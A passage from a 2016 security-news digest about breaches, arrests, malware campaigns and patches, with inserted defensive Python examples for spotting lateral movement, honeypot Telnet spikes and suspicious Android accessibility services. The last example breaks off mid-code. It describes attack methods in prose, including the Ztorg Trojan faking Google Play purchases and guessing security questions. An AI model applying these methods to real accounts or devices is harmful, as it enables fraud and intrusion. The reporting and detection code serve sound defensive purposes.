"Currently, we have no further information since the responsible law enforcement agency did not get in touch with us directly, we were merely informed by our hoster," Perfect Privacy explains. "Since we are not logging any data there is currently no reason to believe that any user data was compromised."
Perfect Privacy confirms that the company was back up and running the following day after I3D provided two replacement servers, meaning that the seizures did not result in any significant outage.
In April, Dutch police seized Ennetcom servers based in the Netherlands and Canada to shut down its operations during a criminal investigation. Ennetcom was a company that sold customized BlackBerry phones connected to a secure PGP-encrypted network.
Dutch authorities accused Ennetcom of helping criminals protect their communications to carry out crimes, involving drug trafficking, assassinations, and other serious offenses.
Hacker Who Hacked Official Linux Kernel Website Arrested in Florida
3.9.2016 thehackernews Hacking
Around five years after unknown hackers gained unauthorized access to multiple kernel.org servers used to maintain and distribute the Linux operating system kernel, police have arrested a South Florida computer programmer for carrying out the attack.
Donald Ryan Austin, a 27-year-old programmer from El Portal, Florida, was charged Thursday with hacking servers belonging to the Linux Kernel Organization (kernel.org) and the Linux Foundation in 2011, the Department of Justice announced on Thursday.
The Linux Kernel Organization runs kernel.org servers for distributing the Linux operating system kernel, which is the heart of the operating system, whereas the Linux Foundation is a separate group that supports kernel.org.
According to an indictment [PDF] unsealed by federal prosecutors on Monday, Austin managed to steal login credentials of one of the Linux Kernel Organization system administrators in 2011 and used them to install a hard-to-detect malware backdoor, dubbed Phalanx, on servers belonging to the organization.
But what made the breach so significant? Linux is the open-source operating system used by millions of corporate and government networks worldwide.
Using the Phalanx malware, Austin allegedly installed Ebury, a Trojan designed for hacking Linux, FreeBSD or Solaris systems, on a number of servers run by the Linux groups, which helped him obtain the login credentials of people using those servers.
Austin allegedly infected Linux servers, including "Odin1," "Zeus1," and "Pub3," which were leased by the Linux Foundation for operating kernel.org. He also hacked the personal email server of Linux Kernel Organization’s founder Peter Anvin.
Austin is also accused of using his unauthorized admin privileges to insert messages into the system that would be displayed when the servers restarted.
According to prosecutors, Austin's motive for the intrusion was to gain early access to Linux software builds distributed through the www.kernel.org website.
Bad Luck! Hacker Arrested while Breaking Traffic Rules
This security breach forced the Linux Foundation to shut down kernel.org completely while the malware infection was cleaned up and to rebuild several of its servers. Miami Shores police stopped Austin for a traffic violation on August 28 and then arrested him after identifying him as a suspect in the 2011 case.
Austin is charged with 4 counts of "intentional transmission causing damage to a protected computer." He was released from jail on a bond of $50,000 provided by the family of his girlfriend.
The judge has ordered Austin to stay away from the Internet, computers and every type of social media or e-mail service, due to his "substance abuse history."
Austin is scheduled to appear in San Francisco federal court on September 21 before the Honorable Sallie Kim, and if found guilty, he faces a possible sentence of 40 years in prison as well as $2 Million in fines.
The next generation of endpoint protection is arriving
3.9.2016 Security
Next Generation Endpoint Protection (NGEPP) platforms, rather than looking for malware signatures as traditional antivirus software does, analyze processes, changes and connections to recognize activity that indicates malicious behaviour. Although this approach is better at catching zero-day exploits, it has problems of its own.
The difficulties with the new generation of protection vary. For example, reports on device activity can be collected with or without client software.
Enterprises therefore have to decide whether to use an agentless solution and obtain less detailed information about threats, or to collect rich details but then deal with the deployment, management and update problems that come with installing agents.
Then comes the choice of how to find evidence that an intrusion is under way without drowning in the flood of collected data. Once attacks are detected, organizations must find the fastest way to block them.
Vendors trying to solve these problems include companies with broad product lines such as Cisco or EMC, established security vendors such as Bit9+Carbon Black, FireEye, ForeScout, Guidance Software, Trend Micro and others, and newer firms focused on endpoint security such as Cylance, Light Cyber, Outlier Security or Tanium.
This is only a small sample, because the field is crowded and competitors come up with different ways to tackle the problems.
The value of endpoint protection platforms lies in their ability to identify specific attacks and speed up the response once they have been detected. They do this by collecting information about communication between endpoints and other devices on the network, as well as changes made on the endpoint itself that may indicate a compromise.
The database of this endpoint telemetry then becomes a forensic tool for investigating attacks, mapping their progression, identifying devices that need remediation and possibly predicting future threats.
Agent or not?
The main aversion to agents in general is that they are yet another piece of software that has to be deployed, managed and updated. In the case of next-generation endpoint protection they provide a huge amount of otherwise unobtainable endpoint data, but that can also be a disadvantage.
Endpoint agents gather so much information that it can be hard to distinguish attacks from background noise, so it is important that the agents' work is backed by an analytics engine that can handle that volume of data, notes Lawrence Pingree, an analyst at Gartner. The amount of data generated varies by agent and endpoint type.
Without an agent, endpoint protection platforms can still collect valuable data on device activity by tapping into a switch or router and monitoring Windows Network Services and WMI (Windows Management Instrumentation).
This data can include who is logged on to the device, what the user is doing, patch levels, whether other security agents are running, whether USB devices are connected, which processes are running and so on.
Analysis can reveal whether devices are making connections outside the expected pattern, a possible sign of lateral movement by attackers looking for ways to compromise additional computers and escalate privileges.
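To make the "connections outside the expected pattern" check concrete, here is an added Python example (not code from any vendor named in this article) that learns a baseline of (source, destination, port) triples from constructed connection telemetry and then flags workstations that start contacting several new peers on administrative ports. Host names, the port list and the telemetry lines are assumptions built for the example.

```python
from collections import defaultdict

# Constructed endpoint connection telemetry (no real network): each line is
# "timestamp source_host destination_host destination_port". Host names are
# assumptions for this example.
BASELINE_TELEMETRY = """\
2016-08-01T09:00:00Z ws-finance-01 fileserver-01 445
2016-08-01T09:05:00Z ws-finance-01 mail-01 443
2016-08-01T09:10:00Z ws-finance-02 fileserver-01 445
2016-08-01T09:12:00Z ws-finance-02 mail-01 443
2016-08-02T09:01:00Z ws-finance-01 fileserver-01 445
"""

RECENT_TELEMETRY = """\
2016-09-01T11:00:00Z ws-finance-01 fileserver-01 445
2016-09-01T11:02:00Z ws-finance-01 ws-finance-02 445
2016-09-01T11:03:00Z ws-finance-01 ws-finance-03 445
2016-09-01T11:04:00Z ws-finance-01 ws-hr-07 3389
2016-09-01T11:05:00Z ws-finance-01 ws-hr-07 3389
2016-09-01T11:10:00Z ws-finance-02 mail-01 443
2016-09-01T11:11:00Z ws-finance-02 intranet-01 80
"""

# Ports used for administration between hosts (SSH, SMB, RDP, WinRM). A workstation
# that suddenly talks to several peers on these is the lateral-movement pattern
# the article describes.
ADMIN_PORTS = {22, 445, 3389, 5985}


def parse_telemetry(text):
    """Yield (timestamp, source, destination, port) for each non-empty line."""
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, port = line.split()
            yield ts, src, dst, int(port)


def build_baseline(text):
    """Every (source, destination, port) triple observed during the learning window."""
    return {(src, dst, port) for _ts, src, dst, port in parse_telemetry(text)}


def find_unexpected_peers(baseline, text, min_new_peers=2):
    """Return {source: sorted list of (destination, port)} for sources that contacted
    at least min_new_peers destinations on admin ports that are absent from the
    baseline. Repeated connections to the same new peer count once."""
    new_peers = defaultdict(set)
    for _ts, src, dst, port in parse_telemetry(text):
        if port in ADMIN_PORTS and (src, dst, port) not in baseline:
            new_peers[src].add((dst, port))
    return {src: sorted(peers) for src, peers in new_peers.items()
            if len(peers) >= min_new_peers}


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_TELEMETRY)
    for src, peers in find_unexpected_peers(baseline, RECENT_TELEMETRY).items():
        print(f"{src}: new admin-port peers {peers}")
```

The threshold min_new_peers is what keeps a single new file share from paging anyone; in a real deployment the baseline would be rebuilt on a rolling window so that legitimate new servers age into it.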
Using agents can mean needing another management console, which adds complexity and potentially cost, notes Randy Abrams, research director at NSS Labs, which evaluates NGEPP platforms.
"At some point this also translates into a difference in headcount," Abrams explains, adding that managing all the consoles may require more staff, and that translates into higher costs.
It is also a matter of compatibility, says Rob Ayoub, also a research director at NSS Labs. "How do you make sure any two agents work together, and whom do you call if they don't?"
The security of the management and administration of these platforms should also be checked, Pingree notes, to minimize the risk to the platforms themselves from internal attackers.
Enterprises should look for endpoint protection products with tools that allow different levels of access for IT staff with different roles. For example, it would be useful to allow limited access for administrators while incident responders would have greater access, Pingree explains.
Analytics engines
Analytics is essential but also complex, so much so that it can be a separate service, such as the one offered by Red Canary.
Instead of collecting data from endpoints with its own agents, it uses sensors supplied by Bit9+Carbon Black. Red Canary enriches this data with threat intelligence obtained from various other commercial security firms, analyzes everything and generates alerts about the breaches it finds on its customers' networks.
This analytics engine flags potential problems, but human analysts review the flagged events to verify whether they are real threats. This helps enterprise security analysts reduce the number of alerts they have to respond to.
The newly founded company Barkly, in turn, says it is working on an endpoint agent that analyzes the endpoint's situation locally and automatically blocks malicious activity. It also informs the responsible administrator about the actions taken.
These engines need connections to larger threat intelligence sources that hold information on how attacks spread and on the activities that lead to a breach without using code that could be labelled as malware, says Abrams.
Most of what is known about the functions of endpoint detection and response tools is what their makers say about their capabilities. Where possible, prospective buyers should therefore use trial versions to verify the functions and effectiveness for themselves before purchasing. "The downside of emerging technologies is that they are not sufficiently tested," Pingree warns.
Remediation
Endpoint detection tools collect large amounts of data that can be used tactically to stop attacks, but also to support forensic investigation of how events unfolded, from intrusion to exploitation. This can help determine which devices need treatment, and some vendors are trying to automate this process...
Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data
3.9.2016 securityaffairs BigBrothers
Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data and passport details of foreign visitors to Armenia.
A group of Azerbaijani hacktivists has leaked the passport details of foreign visitors to Armenia.
The data breach exposed internal resources of the Security Service (SNS) that are involved in updating information about foreigners' passports.
The hackers breached Armenian government servers stealing sensitive data, including passport scans. Intelligence experts who analyzed the data leaks confirmed their authenticity.
The Anti-Armenia Team took credit for a series of data leaks that the hackers claim were stolen from servers of Armenian national security ministry.
“We would like to notice that Anti – Armenia team is an independent group, who is active for five years and repeatedly makes anxious Armenian side by its cyber attacks,” the group explained to El Reg.
Armenia and Azerbaijan are neighbouring countries that fought a war over the disputed Nagorno-Karabakh region between 1988 and 1994.
There is great tension between the two countries; in April, the Azerbaijani army tried to regain control of the Nagorno-Karabakh Republic, and the fighting caused the death of 350 people.
A source who spoke to El Reg on condition of anonymity said the leaked information is more likely to have come from an insider, ruling out that the so-called Anti-Armenia team hacked Armenian government systems.
“I am familiar with the incident, and [can] confirm, that such attacks really happened, and the documents are legitimate and not fake,” the source told El Reg. “I have more confidence that one of their employees having access to it has been compromised and technical border control service is a part of SNS (Security Service), that’s why there is such overlap, and the documents could be stolen from particular person, and not ‘systems’, like they claim.”
The notorious hacker Guccifer sentenced to 52 months in US prison
3.9.2016 securityaffairs Crime
The notorious Romanian hacker Guccifer has been sentenced to 52 months in prison by a US court for aggravated identity theft and hacking.
The notorious Romanian hacker Guccifer has been sentenced to prison by a US court.
Marcel Lehel Lazar (44), Guccifer's real name, has been sentenced to 52 months in prison for aggravated identity theft and hacking into a protected computer.
Guccifer was arrested in January 2014 in Romania, where he was known to law enforcement for hacking into the accounts of local celebrities. In June 2014 he pleaded guilty and was sentenced by a Romanian court to 7 years in prison for accessing the email accounts of the head of the Romanian intelligence service, George Maior, and of the politician Corina Cretu.
In March 2016, the Romanian authorities accepted the US request for Lazar’s extradition.
Guccifer is very popular in the hacking community, but he became famous to the public after hacking the online accounts of numerous public figures, including members of the Bush family, journalists, actors, former members of the U.S. Cabinet and the U.S. Joint Chiefs of Staff, former Secretary of State Colin Powell, the senior political member Sidney Blumenthal and a former presidential advisor.
Lazar also claimed to have hacked Hillary Clinton's private email server; in recent months he gave a series of interviews to Fox and NBC News, providing details about his intrusion.
Guccifer exploited Clinton’s connection with Blumenthal to access her email server.
Lazar first got into Blumenthal’s AOL email, in March 2013, through detailed Internet research to help him guess Blumenthal’s security question. From Blumenthal’s email, Lazar was then able to track emails based on IP headers and ultimately gain access to the Clinton email server.
Lazar described the server to NBC News (from a Bucharest jail cell) as ‘an open orchid on the Internet’ where he was able to find ‘hundreds of folders’. While he says he accessed the server only twice, he claims to have obtained 2 gigabytes of information. He has so far refused to provide any of the emails to which he gained access. Of the 2 gigabytes of information, he has told Fox News they are hidden because they are ‘too hot’ and ‘a matter of national security’.
Guccifer hacked Hillary Clinton email server (image source: The Telegraph)
There has been concern about who has had access to the Clinton email server. Lazar has said he was able to see ‘up to 10,…, IPs from other parts of the world.’ Research into emails from Clinton's time as Secretary of State has already identified approximately 2,200 emails that contained classified information, some of it marked “Top Secret”.
According to US authorities, the hacker admitted having hacked email and social media accounts of roughly 100 Americans between October 2012 and January 2014.
Kali Linux 2016.2 — Download Latest Release Of Best Operating System For Hackers
2.9.2016 thehackernews OS
As promised at the Black Hat and Def Con security and hacking conferences, Offensive Security – the creators of the Swiss army knife for researchers, penetration testers, and hackers – has finally released the much-awaited Kali Linux 2016.2.
Kali Linux is an open-source Debian-based Linux distribution designed to help ethical hackers and security professionals by bundling a wide range of tools for penetration testing, forensics, hacking and reverse engineering into a single package.
The Kali Linux distribution was previously known as BackTrack.
Kali Linux 2016.2 is an updated Live ISO image of the popular GNU/Linux distribution that includes the latest software versions and enhancements for those who want to deploy the operating system on new systems.
What's new?
Besides bringing the updated Live ISOs of Kali Linux, the Kali Linux team brings multiple variants of the GNU/Linux distribution with various Desktop Environments, specifically KDE, Xfce, MATE, LXDE, and Enlightenment – all available only for 64-bit platforms.
What's even more exciting is that, from Kali Linux 2016.2 onwards, the team promises to release updated Live ISO images of Kali with new software versions and the latest security patches every week.
Since Kali Linux has been the most advanced and widely used distro for penetration testing and forensics, this weekly update has come up as exciting news for those involved in various hacking and security-related projects.
It's been several months since the last update to the official Kali Linux Live ISOs, and there are a few hundred new or updated packages pushed to the Kali repositories.
This means that the packages shipped in the previous Kali Linux ISOs are missing bug fixes and OS improvements that are included in the most recent version of the distro.
"Since our last release several months ago, there's a few hundred new or updated packages which have been pushed to the Kali repos," the Kali Linux team's announcement reads. "This means that anyone downloading an ISO even 3 months old has somewhat of a long 'apt-get dist-upgrade' ahead of them."
You can download the latest Kali Linux 2016.2 ISOs from its official website now. The Kali Linux team has also promised to bring a lot of exciting announcements in the next few weeks, so keep an eye on its announcements for the latest updates.
CZ.NIC experts, thanks to Turris routers, discover a potential botnet attacking the ancient Telnet
2.9.2016 Zive.cz BotNet
Owners of the experimental Turris routers can activate honeypots on them that open TCP ports for communication via SSH and Telnet terminals. In reality, however, the attacker is not compromising your router, which has long since redirected them to a CZ.NIC server.
If you have a Turris router and enrol it in CZ.NIC's honeypot system, you can see for yourself who is trying to get into SSH through port 22 on your IP address and what commands they try. They are usually the same, because some botnet or automated tool is driving them.
In any case, CZ.NIC, which operates the Turris routers, has interesting figures at its disposal, which other members of the community can also access.
In the spring, the experts discovered a huge jump in attacks on the ancient Telnet, which is otherwise on the decline. The volume of attacks was so large and sudden that they started examining the malicious IP addresses and, with the help of Shodan, found that they were largely all kinds of IoT devices, from Internet-connected security cameras to multimedia players and home Wi-Fi routers.
The bots are far from attacking only SSH; interest in the ancient Telnet is still huge (the graph on the left has a logarithmic scale). In May, a botnet that abused the Internet of Things most likely made itself heard.
So it seems that in the spring one of the large botnets started actively attacking the ancient Telnet: it exploits vulnerabilities in network boxes, gets inside them and uses them to try to log in to Telnet across the entire range of IP addresses, a range that also included the owners of Turris routers.
If you operate a device connected to the Internet, you can check the security of its IP address using this tool from CZ.NIC. You will find out whether the IP address happens to appear on the list of attackers, which of course may not be complete.
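As an added example, not CZ.NIC's code or data, the following Python walks a constructed honeypot log of the kind a Turris owner could collect, counts login attempts per month for SSH (port 22) and Telnet (port 23), reports the month in which Telnet attempts jumped by a chosen factor, and lists the most active source IPs for that month, which is the list one would then look up in Shodan. The log lines and the IP addresses (RFC 5737 documentation ranges) are constructed.

```python
from collections import Counter

SERVICE_BY_PORT = {22: "ssh", 23: "telnet"}

# Constructed honeypot log (not CZ.NIC's data). Each line: "timestamp source_ip dest_port username".
# The May Telnet burst is generated below to keep the sample short; its source IPs are
# documentation addresses (RFC 5737), not real attackers.
SAMPLE_HONEYPOT_LOG = """\
2016-04-10T01:00:00Z 198.51.100.7 22 root
2016-04-10T02:00:00Z 198.51.100.7 22 admin
2016-04-10T03:00:00Z 203.0.113.9 23 root
2016-04-11T01:00:00Z 198.51.100.7 22 root
2016-04-11T05:00:00Z 203.0.113.9 23 admin
2016-04-12T01:00:00Z 198.51.100.8 22 root
2016-04-12T02:00:00Z 203.0.113.9 23 root
2016-05-03T01:00:00Z 198.51.100.7 22 root
2016-05-04T01:00:00Z 198.51.100.8 22 root
2016-05-05T01:00:00Z 198.51.100.7 22 admin
""" + "".join(
    f"2016-05-{day:02d}T02:00:00Z 203.0.113.{day} 23 root\n" for day in range(1, 21)
) + "".join(
    f"2016-05-{day:02d}T03:00:00Z 203.0.113.50 23 admin\n" for day in range(10, 15)
)


def parse_log(text):
    """Yield (timestamp, source_ip, port, username) for each non-empty line."""
    for line in text.splitlines():
        if line.strip():
            ts, ip, port, user = line.split()
            yield ts, ip, int(port), user


def attempts_per_month(text):
    """Counter keyed by (YYYY-MM, service) -> number of login attempts."""
    counts = Counter()
    for ts, _ip, port, _user in parse_log(text):
        counts[(ts[:7], SERVICE_BY_PORT.get(port, str(port)))] += 1
    return counts


def detect_spikes(text, service, factor=5):
    """Months in which attempts on `service` reach at least `factor` times the
    previous month's count. Returns a list of (month, count, previous_count)."""
    counts = attempts_per_month(text)
    months = sorted({month for month, svc in counts if svc == service})
    spikes = []
    for prev, cur in zip(months, months[1:]):
        before, now = counts[(prev, service)], counts[(cur, service)]
        if before and now >= factor * before:
            spikes.append((cur, now, before))
    return spikes


def top_sources(text, service, month, n=3):
    """Most active source IPs for one service in one month; the candidates to
    check against Shodan for the IoT fingerprint the article describes."""
    hits = Counter(ip for ts, ip, port, _user in parse_log(text)
                   if ts.startswith(month) and SERVICE_BY_PORT.get(port) == service)
    return hits.most_common(n)


if __name__ == "__main__":
    for month, now, before in detect_spikes(SAMPLE_HONEYPOT_LOG, "telnet"):
        print(f"telnet spike in {month}: {now} attempts (previous month {before})")
        print("top sources:", top_sources(SAMPLE_HONEYPOT_LOG, "telnet", month))
```

A month is a coarse bucket chosen to match the graph in the article; on a real honeypot feed a daily bucket with the same ratio test catches the onset much earlier.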
Hey, Music Lovers! Last.Fm Hack Leaks 43 Million Account Passwords
2.9.2016 THEHACKERNEWS Social
Another Day, Another Data Breach!
If you love to listen to music online and have an account on the Last.fm website, your account details may have been compromised in a data breach that leaked the personal data of more than 43 million users online.
Last.fm was hacked in March 2012, and three months after the breach the London-based music streaming service admitted to the incident and issued a warning encouraging its users to change their passwords.
But now it turns out that the Last.fm data breach was massive, and four years later the stolen data has surfaced publicly.
The copy of the hacked database obtained by the data breach indexing website LeakedSource contained 43,570,999 user records that were originally stolen from Last.fm on March 22, 2012, according to timestamps in the database.
The leaked records include usernames, hashed passwords, email addresses, the date when a user signed up to the website, and ad-related data.
Wait! Have you visited The Hacker News early this week? We reported about the Dropbox massive data breach that had also occurred in 2012, which let hackers get their hands on online cloud storage accounts of more than 68 Million users.
People Are Still So Bad At Picking Passwords
But what makes the Last.fm hack much worse is the weak security measures the website used to store its users’ passwords.
Last.fm stored its users’ passwords using MD5 hashing – which was considered outdated even before 2012 – and without any salt, a random string added to each password before hashing that makes the resulting hashes more difficult for hackers to crack.
LeakedSource says it took them just 2 hours to crack 96% of all the passwords included in the Last.fm data dump, which was possible because of the unsalted MD5 hashing used to store them.
"This algorithm is so insecure it took us two hours to crack and convert over 96 percent of them to visible passwords," LeakedSource said in its blog post, adding that it recently invested significantly in its own "password cracking capabilities for the benefit of our users."
And guess what? Last.fm's analysis of the passwords reveals that the most popular passwords users chose to secure their accounts were extremely weak:
255,319 people used the phrase 123456
92,652 used 'password' as password
Almost 67,000 used 'lastfm'
Around 64,000 used 123456789
46,000 used 'qwerty'
Almost 36,000 used 'abc123'
LeakedSource has added the data to its database, so if you have a Last.fm account you can check whether it has been compromised by searching for your data in LeakedSource’s search engine.
Last.fm is the latest to join the list of "Mega-Breaches" revealed in recent months, in which hundreds of millions of online credentials from years-old data breaches of popular social network sites, including LinkedIn, MySpace, VK.com and Tumblr, were sold on the Dark Web.
The takeaway:
Change the password for your Last.fm account as well as your other online accounts immediately, especially if you are using the same password on multiple sites.
Moreover, make use of a good password manager to create complex passwords for different websites and remember them.
We have listed some of the best password managers that could help you understand the importance of password manager as well as choose one according to your requirement.
Update your Mac OS X — Apple has released Important Security Updates
2.9.2016 THEHACKERNEWS Apple
If you own a Mac laptop or desktop, you need to update your system right now.
It turns out that the critical zero-day security vulnerabilities disclosed last week, which targeted iPhone and iPad users, affect Mac users as well.
Late last week, Apple rolled out iOS 9.3.5 update to patch a total of three zero-day vulnerabilities that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link.
Dubbed "Trident," the security holes were used to create spyware (surveillance malware) called 'Pegasus' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates.
Pegasus could allow an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, the user's location and the microphone.
Pegasus spyware could even allow an attacker to download the victim's passwords and steal the stored list of Wi-Fi networks the device has connected to, along with their passwords.
Apple is now patching the same "Trident" bugs in Safari web browser on its desktop operating system, with urgent security updates for Safari 9 as well as OS X Yosemite and OS X El Capitan.
However, this is not a surprise because iOS and OS X, and mobile and desktop version of Safari browser share much of the same codebase. Therefore, zero-days in Apple’s iOS showed up in OS X as well.
The Pegasus exploit takes advantage of the Trident bugs to remotely jailbreak a victim's device and install a collection of spying software onto it without the user’s knowledge.
One of the key components of the exploit takes advantage of a memory corruption bug in Safari's WebKit, allowing attackers to deliver the malicious payload when a target victim clicks on a malicious link, which initiates the process of taking over the operating system.
In an advisory, Apple warned that visiting a "maliciously crafted website" via Safari browser could allow attackers to execute arbitrary code on a victim's computer.
The patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto’s Citizen Lab.
Based on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security and Citizen Lab traced the three programming blunders and the Pegasus spyware kit to the Israeli "cyber war" organization NSO Group, which sells hacking exploits to governments such as the UAE's.
Users can install security patches for Safari, El Capitan, and Yosemite via the usual software update mechanisms.
BitTorrent client Transmission found distributing Mac malware once again
2.9.2016 securityaffairs Virus
It has happened again, Mac users who were looking for the BitTorrent client Transmission might have been infected by the OSX/Keydnap malware.
Security experts from ESET have spotted the popular BitTorrent client Transmission distributing Mac malware called OSX/Keydnap, which is used to steal the contents of the OS X keychain and maintain a permanent backdoor on victims’ machines.
This is the second time the BitTorrent client Transmission has been used to deliver malicious code. In March, researchers from Palo Alto Networks Unit 42 discovered a malicious campaign, reported by Apple customers looking for the latest version of Transmission, that infected them with a new family of ransomware specifically designed to target OS X installations.
“On March 4, we detected that the Transmission BitTorrent client installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.”” states the report published by Palo Alto Networks.
The researchers named this new Ransomware family KeRanger, they also released a technical analysis of the malware.
Back to the present, researchers at ESET discovered that the Keydnap malware was spread through the official Transmission website.
“During the last hours, OSX/Keydnap was distributed on a trusted website, which turned out to be “something else”. It spread via a recompiled version of the otherwise legitimate open source BitTorrent client application Transmission and distributed on their official website.” reads the blog post published by ESET.
Transmission promptly removed the malicious version from its download section; however, users who downloaded the client between Sunday and Monday should check whether their machine has been compromised.
The Keydnap malware could be used by crooks to establish a backdoor on the compromised machine that can allow them to execute remote commands on the Mac.
Two attacks leveraging the BitTorrent client Transmission, is it a coincidence?
Malware researchers from ESET noted many similarities between the two attacks, for example in both cases the malicious code was added to the main function of the BitTorrent client Transmission. Also in this case, the OSX/Keydnap malicious code was signed with a legitimate code signing key that allows the crooks to bypass the Gatekeeper protection system.
“In both cases, a malicious block of code is added to the main function of the Transmission application,” ESET said. “The code responsible for dropping and running the malicious payload is astonishingly the same. Just like in the KeRanger case, a legitimate code signing key was used to sign the malicious Transmission application bundle. It’s different from the legitimate Transmission certificate, but is still signed by Apple and bypasses Gatekeeper protection.”
Experts speculate that the Transmission website was hacked and that the attackers uploaded the malicious version of the BitTorrent client. ESET has notified Apple about the compromised developer certificate.
SWIFT discloses more cyber attacks on its bank members and urges more security
2.9.2016 securityaffairs Security
SWIFT discloses more attacks against banks worldwide, pressures banks on security and urged member banks to implement the new SWIFT software by November 19.
In the last months, a worrisome string of attacks against banks worldwide through the SWIFT system has alarmed the banking industry. The so-called “SWIFT hackers” have conducted multiple cyber attacks against financial institutions. We reported the successful cyber heists on the Bangladesh bank, against a Ukrainian bank, and the Ecuadorian bank, meanwhile, a Vietnam bank reported to have blocked an ongoing cyber heist.
In May, a fourth Bank in the Philippines was a victim of the SWIFT hackers and the experts at Symantec confirmed the malware used by the crooks shares code with tools used by the notorious Lazarus group linked to the North Korean Government.
According to the Reuters agency, the SWIFT issued a new warning urging member banks to implement the new SWIFT software by 19 November.
The latest version of SWIFT’s software implements new security features specifically designed to defeat this kind of attack. The authentication processes have been improved, and mechanisms for the early detection of fraudulent activity have been implemented.
“Customers’ environments have been compromised, and subsequent attempts (were) made to send fraudulent payment instructions. The threat is persistent, adaptive and sophisticated – and it is here to stay.” SWIFT states.
The organization hasn’t provided further details on the alleged additional cyber attacks against banks worldwide.
“All the victims shared one thing in common,” says Reuters: “Weaknesses in local security that attackers exploited to compromise local networks and send fraudulent messages requesting money transfers.”
The SWIFT logo is pictured in this photo illustration taken April 26, 2016. REUTERS/Carlo Allegri/Illustration/File Photo
SWIFT told banks that it might report the incident to regulators and banking partners if they failed to adopt the new SWIFT software.
Despite SWIFT’s efforts, many experts speculate that the new security features are not enough to consider the banking systems completely secure.
Of course, the cyber attacks have prompted regulators globally to press financial institutions to bolster their security defenses.
Roughly 43 Million Last.fm accounts were stolen in a 2012 security breach
2.9.2016 securityaffairs Crime
According to the breach notification service LeakedSource roughly 43 million Last.fm accounts were compromised in a 2012 incident.
In June 2012, the online music service Last.fm was compromised by hackers; in response, the company notified its users of the incident and invited them to change their passwords.
Some experts speculated the security breach took place several months earlier.
The company was using the MD5 hashing algorithm with no salt to protect passwords, which is known to be a weak security implementation; for this reason, Last.fm also announced some improvements to the way passwords are stored.
“We are currently investigating the leak of some Last.fm user passwords. This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we’re asking all our users to change their passwords immediately.” states the Last.fm Password Security Update.
“We strongly recommend that your new Last.fm password is different to the password you use on other services.”
The real number of impacted users was not disclosed at the time of the data breach, but now we know more about the incident. According to the breach notification service LeakedSource roughly 43 million accounts were compromised in the incident.
The leaked records include usernames, passwords, email addresses, dates of registration and some other internal data.
“Music service Last.fm was hacked on March 22nd, 2012 for a total of 43,570,999 users. This data set was provided to us by daykalif@xmpp.jp and Last.fm already knows about the breach but the data is just becoming public now like all the others.” reported LeakedSource.
“Each record contains a username, email address, password, join date, and some other internal data. We verified the legitimacy of this data set with Softpedia reporter Catalin C who was in the breach himself along with his colleagues.”
According to LeakedSource, its experts managed to crack 96 percent of the unsalted MD5 hashes within a couple of hours.
Below are the top 10 passwords:
The revelation about the Last.fm data breach arrives a couple of days after Dropbox confirmed that hackers stole 68 million accounts in 2012.
Unfortunately, the list of data breaches is very long and includes other IT giants, such as LinkedIn, MySpace, VK.com and Tumblr.
How Trojans manipulate Google Play
1.9.2016 Kaspersky Android
For malware writers, Google Play is the promised land of sorts. Once there, a malicious application gains access to a wide audience, gains the trust of that audience and experiences a degree of leniency from the security systems built into operating systems. On mobile devices, users typically cannot install applications coming from sources other than the official store, meaning this is a serious barrier for an app with malicious intent. However, it is far from easy for the app to get into Google Play: one of the main conditions for it is to pass a rigorous check for unwanted behavior by different analysis systems, both automatic and manual.
Some malware writers have given up on their efforts to push their malicious creations past security checks, and instead learned how to use the store’s client app for their unscrupulous gains. Lately, we have seen many Trojans use the Google Play app during promotion campaigns to download, install and launch apps on smartphones without the owners’ knowledge, as well as leave comments and rate apps. The apps installed by the Trojan do not typically cause direct damage to the user, but the victim may have to pay for the created excessive traffic. In addition, the Trojans may download and install paid apps as if they were free ones, further adding to the users’ bills.
Let us look at how such manipulations of Google Play are carried out.
Level 1. N00b
The first method is to make the official Google Play app store undertake the actions the cybercriminal wants. The idea is to use the Trojan to launch the client, open the page of the required app in it, then search for and use special code to interact with the interface elements (buttons) to cause download, installation and launch of the application. The misused interface elements are outlined with red boxes in the screenshots below:
The exact methods of interaction with the interface vary. In general, the following techniques may be identified:
Use of the Accessibility services of the operating system (used by modules in Trojan.AndroidOS.Ztorg).
Imitation of user input (used by Trojan-Clicker.AndroidOS.Gopl.c).
Code injection into the process of Google Play client to modify its operation (used by Trojan.AndroidOS.Iop).
To see how such Trojans operate, let us look at the example of Trojan.AndroidOS.Ztorg.n. This malicious program uses Accessibility services, which were originally intended for creating applications that help people with disabilities, such as GUI voice control apps. The Trojan receives a job from the command and control server (C&C) which contains a link to the required application, opens it in Google Play, and then launches the following code:
This code is needed to detect when the required interface element appears on the screen, and to emulate the click on it. This way, the following buttons are clicked in a sequence: “BUY” (the price is shown in the button), “ACCEPT” and “CONTINUE”. This is sufficient to purchase the app, if the user has a credit card with sufficient balance connected to his/her Google account.
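The footprint this technique leaves on a device is an accessibility service enabled by a package that has no business owning one. The Python below is an added example, not code from the Kaspersky article: it parses the value of the Secure setting enabled_accessibility_services (what `adb shell settings get secure enabled_accessibility_services` prints) and flags services from packages outside an allowlist. The allowlist and the sample setting value are constructed for the example.

```python
"""Audit enabled Android accessibility services (added example, not the
article's code).

Android stores the enabled services as a colon-separated list of flattened
component names, e.g. `pkg/class:pkg2/.ShortClass`; the class part may be a
shorthand starting with '.' that is relative to the package.
"""

# Packages expected to own an accessibility service on a stock device.
# This allowlist is an assumption for the example; extend it per device fleet.
KNOWN_ACCESSIBILITY_PACKAGES = {
    "com.google.android.marvin.talkback",   # TalkBack screen reader
}

# Constructed sample value, as `settings get secure enabled_accessibility_services`
# would print it on a device where a sideloaded "cleaner" app enabled a service.
SAMPLE_SETTING = (
    "com.google.android.marvin.talkback/"
    "com.google.android.marvin.talkback.TalkBackService:"
    "com.cleaner.boost/.PlayHelperService"
)


def parse_enabled_services(setting_value):
    """Return a list of (package, fully-qualified class) tuples.

    `settings get` prints the literal string "null" when nothing is enabled;
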